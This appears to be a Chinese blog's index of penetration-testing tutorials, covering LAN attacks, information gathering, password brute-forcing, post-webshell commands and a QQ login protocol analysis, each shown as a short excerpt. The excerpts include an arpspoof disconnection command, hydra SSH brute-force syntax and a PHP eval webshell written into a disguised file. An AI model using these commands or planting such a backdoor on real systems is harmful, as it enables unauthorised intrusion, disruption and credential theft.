渗透
跟派大星学编程
从HelloWorld到改变世界
展开
-
渗透学习(3)局域网攻击
一、断网攻击此为局域网断网攻击1)查看自己的IP地址,记住默认网关2)扫描局域网中的IPfping -asg 10.62.84.0/243)使用arpspoof进行断网攻击arpspoof -i 网卡 -t 目标ip 网关eth0为你的网卡原创 2017-12-29 20:46:58 · 17242 阅读 · 0 评论 -
渗透学习(1)信息收集
一、服务器信息扫描1、nikto 扫描服务器信息漏洞nikto -h 目标主机2、whatweb收集网站信息3、nmap扫描服务器开启了那些端口4、whois 拿到网站持有者人的信息原创 2018-01-02 20:06:26 · 3997 阅读 · 1 评论 -
渗透学习(4)密码爆破
一、爆破SSH密码hydra [[[-l login|-L file] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w time] [-f] [-s PORT] [-S] [-vV] server service [OPT]-R 继续从上一次进度接着破解。原创 2018-01-06 21:16:59 · 1315 阅读 · 0 评论 -
渗透学习(2)漏洞扫描
一、使用nmapnmap --script=脚本名字 目标主机原创 2018-01-07 22:22:18 · 2138 阅读 · 0 评论 -
渗透过程中常用的cmd命令
在web渗透测试过程中,当我们通过某个漏洞利用成功获取到webshell后,下一步便要通过webshell(通常是大马)进行提权或打包数据。由于webshell对远程服务器的操控,是通过命令行而非图形化界面实现的,因此,渗透过程中熟悉常用的命令十分有必要,本文总结了一些黑客入侵时常用的命令。今天先对于windows服务器(cmd命令)总结:ipconfig /all #查...转载 2018-03-27 20:01:29 · 3370 阅读 · 0 评论 -
入侵Linux服务器常用命令
写个php一句话后门上去:$ echo -e "<?php @eval($_POST[md5])?>" >rankuplog_time.php$ cat rankuplog_time.php1.linux的想着先跨站。shell浏览目标站不行,命令行下输入ls -la /www.users/2.溢出提权# python –c ‘impotr pty;pty.s...转载 2019-02-28 18:48:11 · 1205 阅读 · 0 评论 -
QQ快速登录协议分析
1.获取pt_local_token请求https://xui.ptlogin2.qq.com/cgi-bin/xlogin?s_url=https%3A%2F%2Fhuifu.qq.com%2Findex.html&amp;style=20&amp;appid=715021417&amp;proxy_url=https%3A%2F%2Fhuifu.qq.com%2Fproxy.html...原创 2019-03-16 21:13:28 · 13082 阅读 · 14 评论